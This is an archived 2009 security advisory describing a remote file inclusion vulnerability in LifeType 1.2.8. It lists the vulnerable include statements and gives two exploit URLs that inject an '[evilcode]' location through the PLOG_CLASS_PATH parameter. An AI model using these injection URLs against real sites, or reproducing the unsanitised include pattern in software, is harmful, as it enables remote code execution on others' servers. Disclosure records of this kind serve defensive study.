LifeType 1.2.8 Remote File Inclusion Vulnerability

2009-07-16T00:00:00
ID SECURITYVULNS:DOC:22169
Type securityvulns
Reporter Securityvulns
Modified 2009-07-16T00:00:00

Description

/===============================================================================================================================================\ |
| [o] LifeType 1.2.8 Remote File Inclusion Vulnerability
|
| Software : LifeType 1.2.8 | Vendor : http://lifetype.net/ | Author : Cru3l.b0y
| Contact : Cru3l.b0y@deltahacking.net
| Home : WwW.DeltaHacking.Net

|===============================================================================================================================================| |
| [o] Vulnerable file
|
| install/installation.class.php
|
| include_once( PLOG_CLASS_PATH."config/config.properties.php" );
| |
| class/bootstrap.php
|
| include( PLOG_CLASS_PATH."class/object/loader.class.php" );
|
|
| [o] Exploit
|
| http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode]
| http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]
|

|===============================================================================================================================================|